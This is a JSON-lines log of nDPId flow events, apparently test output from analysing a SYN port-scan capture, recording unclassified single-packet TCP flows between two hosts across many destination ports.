-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 